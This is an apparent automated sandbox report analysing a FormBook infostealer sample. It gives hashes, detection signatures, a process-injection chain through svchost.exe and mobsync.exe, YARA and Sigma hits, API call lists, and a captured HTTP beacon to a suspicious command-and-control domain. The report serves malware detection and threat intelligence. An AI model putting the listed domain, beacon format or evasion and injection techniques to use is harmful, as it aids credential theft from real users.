Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Gz2FxKx2cM.exe

Overview

General Information

Sample name:Gz2FxKx2cM.exe
renamed because original name is a hash value
Original sample name:f3a50ff1e7a5fbde11e1f103161b01284e78d8bad05116052b6bfda6e9cac55a.exe
Analysis ID:1588319
MD5:f0483efd3c238f3181609c3aa40fdac6
SHA1:9a5fa8d3e90ef6de9ef7117f87a9eabcb39d1189
SHA256:f3a50ff1e7a5fbde11e1f103161b01284e78d8bad05116052b6bfda6e9cac55a
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Gz2FxKx2cM.exe (PID: 7636 cmdline: "C:\Users\user\Desktop\Gz2FxKx2cM.exe" MD5: F0483EFD3C238F3181609C3AA40FDAC6)
    • svchost.exe (PID: 7724 cmdline: "C:\Users\user\Desktop\Gz2FxKx2cM.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • HFOpYoEqWJkRNv.exe (PID: 796 cmdline: "C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • mobsync.exe (PID: 8028 cmdline: "C:\Windows\SysWOW64\mobsync.exe" MD5: F7114D05B442F103BD2D3E20E78A7AA5)
          • HFOpYoEqWJkRNv.exe (PID: 6844 cmdline: "C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8180 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.1677515886.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.1677859953.0000000003690000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.2677153382.0000000004B80000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.1921397485.0000000004180000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000007.00000002.1921482656.00000000041D0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Gz2FxKx2cM.exe", CommandLine: "C:\Users\user\Desktop\Gz2FxKx2cM.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Gz2FxKx2cM.exe", ParentImage: C:\Users\user\Desktop\Gz2FxKx2cM.exe, ParentProcessId: 7636, ParentProcessName: Gz2FxKx2cM.exe, ProcessCommandLine: "C:\Users\user\Desktop\Gz2FxKx2cM.exe", ProcessId: 7724, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Gz2FxKx2cM.exe", CommandLine: "C:\Users\user\Desktop\Gz2FxKx2cM.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Gz2FxKx2cM.exe", ParentImage: C:\Users\user\Desktop\Gz2FxKx2cM.exe, ParentProcessId: 7636, ParentProcessName: Gz2FxKx2cM.exe, ProcessCommandLine: "C:\Users\user\Desktop\Gz2FxKx2cM.exe", ProcessId: 7724, ProcessName: svchost.exe

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: Gz2FxKx2cM.exeReversingLabs: Detection: 71%
                Source: Gz2FxKx2cM.exeVirustotal: Detection: 54%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.1677515886.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1677859953.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2677153382.0000000004B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1921397485.0000000004180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1921482656.00000000041D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2675484945.0000000003440000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1678285172.0000000004550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: Gz2FxKx2cM.exeJoe Sandbox ML: detected
                Source: Gz2FxKx2cM.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: mobsync.pdbGCTL source: svchost.exe, 00000002.00000003.1643779067.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643880204.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643896188.0000000003031000.00000004.00000020.00020000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000004.00000002.2675184319.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HFOpYoEqWJkRNv.exe, 00000004.00000002.2673839896.000000000085E000.00000002.00000001.01000000.00000005.sdmp, HFOpYoEqWJkRNv.exe, 00000008.00000002.2675044855.000000000085E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Gz2FxKx2cM.exe, 00000000.00000003.1459399779.0000000003850000.00000004.00001000.00020000.00000000.sdmp, Gz2FxKx2cM.exe, 00000000.00000003.1458037933.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1677898347.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582627864.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580605438.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1677898347.0000000003700000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000007.00000003.1683183882.0000000004238000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000007.00000003.1681267661.000000000408F000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000007.00000002.1921600498.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000007.00000002.1921600498.000000000457E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Gz2FxKx2cM.exe, 00000000.00000003.1459399779.0000000003850000.00000004.00001000.00020000.00000000.sdmp, Gz2FxKx2cM.exe, 00000000.00000003.1458037933.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1677898347.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582627864.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580605438.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1677898347.0000000003700000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000007.00000003.1683183882.0000000004238000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000007.00000003.1681267661.000000000408F000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000007.00000002.1921600498.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000007.00000002.1921600498.000000000457E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: mobsync.pdb source: svchost.exe, 00000002.00000003.1643779067.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643880204.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643896188.0000000003031000.00000004.00000020.00020000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000004.00000002.2675184319.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: mobsync.exe, 00000007.00000002.1920673882.0000000002709000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000007.00000002.1921955822.0000000004A0C000.00000004.10000000.00040000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000008.00000000.1749658940.000000000274C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2673702912.0000000014C3C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: mobsync.exe, 00000007.00000002.1920673882.0000000002709000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000007.00000002.1921955822.0000000004A0C000.00000004.10000000.00040000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000008.00000000.1749658940.000000000274C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2673702912.0000000014C3C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0096445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0096445A
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0096C6D1 FindFirstFileW,FindClose,0_2_0096C6D1
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0096C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0096C75C
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0096EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0096EF95
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0096F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0096F0F2
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0096F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0096F3F3
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_009637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009637EF
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_00963B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00963B12
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0096BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0096BCBC

                Networking

                barindex
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.izmirescortg.xyz
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_009722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_009722EE
                Source: global trafficHTTP traffic detected: GET /lnl7/?_Lgdx=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgZUCCvIMy+6OdADZldWa3Ro5vmyUj0qJuSG5eCoJgas7XnA==&Vf4hC=XvLPHfTX HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.izmirescortg.xyzUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.izmirescortg.xyz
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 22:58:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cachecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jX%2Ftr0tYJK%2FVuPWsk1Rktd8%2Bi8Yl8lwFv%2BsNV5OydejmiqjzgIuv4kXEYkHtbAym5mkB9SsvlsE1%2F4hU4puZTfmlRAFPQt1A7Bz7sKleyfDteJcLCGu4UUtaBh%2F4lY3Ztv6gjHlXYw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 900044fe2a950f80-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1625&min_rtt=1625&rtt_var=812&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=377&delivery_rate=0&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 34 64 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 Data Ascii: 4d6<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <di
                Source: mobsync.exe, 00000007.00000002.1921955822.0000000004DF4000.00000004.10000000.00040000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000008.00000002.2675961964.0000000002B34000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2673702912.0000000015024000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
                Source: mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: mobsync.exe, 00000007.00000002.1920673882.0000000002723000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: mobsync.exe, 00000007.00000002.1920673882.0000000002723000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: mobsync.exe, 00000007.00000003.1858808819.000000000754E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: mobsync.exe, 00000007.00000002.1920673882.0000000002723000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: mobsync.exe, 00000007.00000002.1920673882.0000000002723000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033t
                Source: mobsync.exe, 00000007.00000002.1920673882.0000000002723000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: mobsync.exe, 00000007.00000002.1920673882.0000000002723000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_00974164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00974164
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_00974164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00974164
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_00973F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00973F66
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0096001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0096001C
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0098CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0098CABC

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.1677515886.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1677859953.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2677153382.0000000004B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1921397485.0000000004180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1921482656.00000000041D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2675484945.0000000003440000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1678285172.0000000004550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: This is a third-party compiled AutoIt script.0_2_00903B3A
                Source: Gz2FxKx2cM.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: Gz2FxKx2cM.exe, 00000000.00000000.1421011141.00000000009B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e413e8b3-d
                Source: Gz2FxKx2cM.exe, 00000000.00000000.1421011141.00000000009B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_938d8299-d
                Source: Gz2FxKx2cM.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b3a8d038-a
                Source: Gz2FxKx2cM.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_471bca0b-8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C483 NtClose,2_2_0042C483
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B60 NtClose,LdrInitializeThunk,2_2_03772B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03772DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037735C0 NtCreateMutant,LdrInitializeThunk,2_2_037735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774340 NtSetContextThread,2_2_03774340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774650 NtSuspendThread,2_2_03774650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BF0 NtAllocateVirtualMemory,2_2_03772BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BE0 NtQueryValueKey,2_2_03772BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BA0 NtEnumerateValueKey,2_2_03772BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B80 NtQueryInformationFile,2_2_03772B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AF0 NtWriteFile,2_2_03772AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AD0 NtReadFile,2_2_03772AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AB0 NtWaitForSingleObject,2_2_03772AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F60 NtCreateProcessEx,2_2_03772F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F30 NtCreateSection,2_2_03772F30
